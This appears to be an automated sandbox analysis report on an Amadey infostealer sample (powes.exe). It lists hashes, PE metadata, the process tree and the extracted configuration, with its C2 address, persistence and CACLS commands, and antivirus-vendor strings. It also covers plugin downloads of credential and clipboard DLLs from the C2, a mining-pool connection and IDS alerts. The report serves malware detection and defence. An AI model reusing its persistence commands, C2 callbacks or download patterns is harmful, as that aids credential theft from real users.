Field | Value
---|---
File name | powes.exe
Full analysis | https://app.any.run/tasks/23d5db3f-c7b7-499e-adc1-b216e7c27b0b
Verdict | Malicious activity
Threats | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.
Analysis date | April 01, 2023, 14:19:21
OS | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags | 
Indicators | 
MIME | application/x-dosexec
File info | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 | DA453134EB08FCD88431CB7CCF97C98A
SHA1 | 56977416D77214C6EACEC50A23077AB1AD1B8E3A
SHA256 | F08484E803EC708FE0082DDA9E6C5CC9F9CBF7405972F03C17AF93C1DFF7E84C
SSDEEP | 98304:E/B7WLWofXOBm5LuybBkGI1WzF2+PFmtmGMlGEkJJ5rGDhXK:i7Wa2ckna1yPMjVZM
Extension | Type
---|---
.exe | Generic CIL Executable (.NET, Mono, etc.) (63.1)
.exe | Win64 Executable (generic) (23.8)
.dll | Win32 Dynamic Link Library (generic) (5.6)
.exe | Win32 Executable (generic) (3.8)
.exe | Generic Win/DOS Executable (1.7)
Field | Value
---|---
AssemblyVersion | 1.0.0.0
ProductVersion | 1.0.0.0
OriginalFileName | powes.exe
LegalCopyright | 
InternalName | powes.exe
FileVersion | 1.0.0.0
FileDescription | 
CharacterSet | Unicode
LanguageCode | Neutral
FileSubtype | -
ObjectFileType | Executable application
FileOS | Win32
FileFlags | (none)
FileFlagsMask | 0x003f
ProductVersionNumber | 1.0.0.0
FileVersionNumber | 1.0.0.0
Subsystem | Windows GUI
SubsystemVersion | 4
ImageVersion | -
OSVersion | 4
EntryPoint | 0x45f28e
UninitializedDataSize | -
InitializedDataSize | 2048
CodeSize | 4576256
LinkerVersion | 11
PEType | PE32
ImageFileCharacteristics | Executable, 32-bit
TimeStamp | 2023:04:01 09:43:11+00:00
MachineType | Intel 386 or later, and compatibles
Field | Value
---|---
Architecture | IMAGE_FILE_MACHINE_I386
Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date | 01-Apr-2023 09:43:11
FileDescription | -
FileVersion | 1.0.0.0
InternalName | powes.exe
LegalCopyright | -
OriginalFilename | powes.exe
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0
Field | Value
---|---
Magic number | MZ
Bytes on last page of file | 0x0090
Pages in file | 0x0003
Relocations | 0x0000
Size of header | 0x0004
Min extra paragraphs | 0x0000
Max extra paragraphs | 0xFFFF
Initial SS value | 0x0000
Initial SP value | 0x00B8
Checksum | 0x0000
Initial IP value | 0x0000
Initial CS value | 0x0000
Overlay number | 0x0000
OEM identifier | 0x0000
OEM information | 0x0000
Address of NE header | 0x00000080
Field | Value
---|---
Signature | PE
Machine | IMAGE_FILE_MACHINE_I386
Number of sections | 3
Time date stamp | 01-Apr-2023 09:43:11
Pointer to Symbol Table | 0x00000000
Number of symbols | 0
Size of Optional Header | 0x00E0
Characteristics | 
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x0045D294 | 0x0045D400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.8827 |
.rsrc | 0x00460000 | 0x000004D0 | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.69347 |
.reloc | 0x00462000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.00112 | 490 | UNKNOWN | UNKNOWN | RT_MANIFEST |
Imports | mscoree.dll
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
1036 | "C:\Users\admin\AppData\Local\Temp\powes.exe" | C:\Users\admin\AppData\Local\Temp\powes.exe | | explorer.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0; Version: 1.0.0.0
2032 | "C:\Users\admin\AppData\Local\Temp\Player3.exe" | C:\Users\admin\AppData\Local\Temp\Player3.exe | | powes.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
1844 | "C:\Users\admin\AppData\Local\Temp\ss31.exe" | C:\Users\admin\AppData\Local\Temp\ss31.exe | | powes.exe | User: admin; Integrity Level: MEDIUM
840 | "C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" | C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe | | Player3.exe | User: admin; Integrity Level: MEDIUM
1504 | "C:\Users\admin\AppData\Local\Temp\XandETC.exe" | C:\Users\admin\AppData\Local\Temp\XandETC.exe | — | powes.exe | User: admin; Company: Google Inc.; Integrity Level: MEDIUM; Description: Google Chrome; Exit code: 3221226540; Version: 90,1,32,10
304 | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F | C:\Windows\SysWOW64\schtasks.exe | — | nbveek.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2184 | "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nbveek.exe" /P "admin:N"&&CACLS "nbveek.exe" /P "admin:R" /E&&echo Y\|CACLS "..\16de06bfb4" /P "admin:N"&&CACLS "..\16de06bfb4" /P "admin:R" /E&&Exit | C:\Windows\SysWOW64\cmd.exe | — | nbveek.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2436 | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | C:\Windows\SysWOW64\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2560 | CACLS "nbveek.exe" /P "admin:N" | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Control ACLs Program; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2684 | CACLS "nbveek.exe" /P "admin:R" /E | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Control ACLs Program; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Amadey configuration extracted from process 840 (nbveek.exe)

Strings (116): SCHTASKS /Create /SC MINUTE /MO 1 /TN /TR " " /F SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Rem cmd /C RMDIR /s/q SOFTWARE\Microsoft\Windows\CurrentVersion\Run rundll32 /Delete /TN " Programs SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders %USERPROFILE% \App POST GET id= &vs= &sd= &os= &bi= &ar= &pc= &un= &dm= &av= &lv= &og= cred.dll|clip.dll| d1 e1 e0 Main http:// https:// exe dll cmd ps1 <c> <d> Plugins/ +++ # | &unit= = shell32.dll kernel32.dll GetNativeSystemInfo ProgramData\ AVAST Software Avira Kaspersky Lab ESET Panda Security Doctor Web AVG 360TotalSecurity Bitdefender Norton Sophos Comodo WinDefender 0123456789 rb wb Content-Type: multipart/form-data; boundary=---- ------ Content-Disposition: form-data; name="data"; filename=" " Content-Type: application/octet-stream ------ -- ?scr=1 .jpg Content-Type: application/x-www-form-urlencoded SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName ComputerName abcdefghijklmnopqrstuvwxyz0123456789-_ -unicode- SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\ SYSTEM\ControlSet001\Services\BasicDisplay\Video VideoID \0000 DefaultSettings.XResolution DefaultSettings.YResolution SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductName 2019 2022 2016 CurrentBuild && echo Y|CACLS " " /P " :N" CACLS " " /P " :R" /E :F" /E &&Exit ..\ \ ::: rundll32.exe /k "taskkill /f /im " " && timeout 1 && del && Exit" " && ren && Powershell.exe -executionpolicy remotesigned -File " "

Options: Drop name: nbveek.exe; Drop directory: 16de06bfb4; Version: 3.65

C2 (1): http://77.73.134.27
PID | Process | Key | Name | Operation | Value
---|---|---|---|---|---
1036 | powes.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1
1036 | powes.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1
1036 | powes.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1
1036 | powes.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0
2032 | Player3.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1
2032 | Player3.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1
2032 | Player3.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1
2032 | Player3.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0
1844 | ss31.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | write | 0
1844 | ss31.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | write | 460000008B000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2032 | Player3.exe | C:\Users\admin\AppData\Local\Temp\16de06bfb4\nbveek.exe | executable | 43A3E1C9723E124A9B495CD474A05DCB | 619BBBC9E9DDD1F6B7961CACB33D99C8F558499A33751B28D91085AAB8CB95AB
1036 | powes.exe | C:\Users\admin\AppData\Local\Temp\Player3.exe | executable | 43A3E1C9723E124A9B495CD474A05DCB | 619BBBC9E9DDD1F6B7961CACB33D99C8F558499A33751B28D91085AAB8CB95AB
840 | nbveek.exe | C:\Users\admin\AppData\Local\Temp\896776584425 | image | C29C44997ED442243C9344076E92A6BB | B5A63D269C1032DE729202BA7050685F28C92DA2C8F3289FE0AEC3FF38DC5BFF
840 | nbveek.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\clip64[1].dll | executable | D3074D3A19629C3C6A533C86733E044E | B1F486289739BADF85C2266B7C2BBBC6C620B05A6084081D09D0911C51F7C401
1036 | powes.exe | C:\Users\admin\AppData\Local\Temp\ss31.exe | executable | 70336369523D7426108C4BF0CFAD3845 | B14E0E157B905CA0B38EB97543A72959D8308FA649D37510D5E94C7B624A696B
2284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\nkgmluth.lwh.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
840 | nbveek.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\cred64[1].dll | executable | 2C4E958144BD089AA93A564721ED28BB | B597B1C638AE81F03EC4BAAFA68DDA316D57E6398FE095A58ECC89E8BCC61855
2416 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jndwgnav.wx1.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1600 | powershell.exe | C:\Users\admin\AppData\Local\Temp\oulmrqg1.znv.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2416 | powershell.exe | C:\Users\admin\AppData\Local\Temp\t0gzyq01.rv1.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
840 | nbveek.exe | POST | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/index.php?scr=1 | KZ | — | — | malicious |
1844 | ss31.exe | GET | 200 | 154.221.31.191:80 | http://count.iiagjaggg.com/check/safe | HK | text | 96 b | malicious |
840 | nbveek.exe | GET | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll | KZ | executable | 1.02 Mb | malicious |
3020 | powershell.exe | GET | 304 | 178.79.242.11:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6735b6e27a18b74a | DE | — | — | whitelisted |
1844 | ss31.exe | GET | 200 | 103.100.211.218:80 | http://bz.bbbeioaag.com/sts/bimage.jpg | HK | image | 1.45 Mb | malicious |
840 | nbveek.exe | GET | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll | KZ | executable | 89.0 Kb | malicious |
840 | nbveek.exe | POST | 200 | 77.73.134.27:80 | http://77.73.134.27/8bmdh3Slb2/index.php | KZ | text | 6 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1844 | ss31.exe | 157.240.253.35:443 | www.facebook.com | FACEBOOK | DE | suspicious |
1844 | ss31.exe | 103.100.211.218:80 | bz.bbbeioaag.com | YISU CLOUD LTD | HK | malicious |
1844 | ss31.exe | 154.221.31.191:80 | count.iiagjaggg.com | YISU CLOUD LTD | HK | malicious |
840 | nbveek.exe | 77.73.134.27:80 | — | Partner LLC | KZ | malicious |
3020 | powershell.exe | 178.79.242.11:80 | ctldl.windowsupdate.com | LLNW | DE | suspicious |
2956 | conhost.exe | 92.222.217.165:14433 | xmr-eu2.nanopool.org | OVH SAS | FR | unknown |
Domain | IP | Reputation
---|---|---
bz.bbbeioaag.com | | malicious
www.facebook.com | | whitelisted
count.iiagjaggg.com | | malicious
ctldl.windowsupdate.com | | whitelisted
xmr-eu2.nanopool.org | | unknown
PID | Process | Class | Message |
---|---|---|---|
1844 | ss31.exe | A Network Trojan was detected | AV INFO Suspicious UA HTTPREAD |
840 | nbveek.exe | A Network Trojan was detected | AV TROJAN Agent.DHOA System Info Exfiltration |
840 | nbveek.exe | Unknown Classtype | ET MALWARE Amadey CnC Check-In |
840 | nbveek.exe | A Network Trojan was detected | ET MALWARE Amadey Bot Activity (POST) |
1844 | ss31.exe | Potentially Bad Traffic | ET HUNTING Double User-Agent (User-Agent User-Agent) |
840 | nbveek.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host DLL Request |
840 | nbveek.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .dll file with no User-Agent |
840 | nbveek.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
840 | nbveek.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
840 | nbveek.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host DLL Request |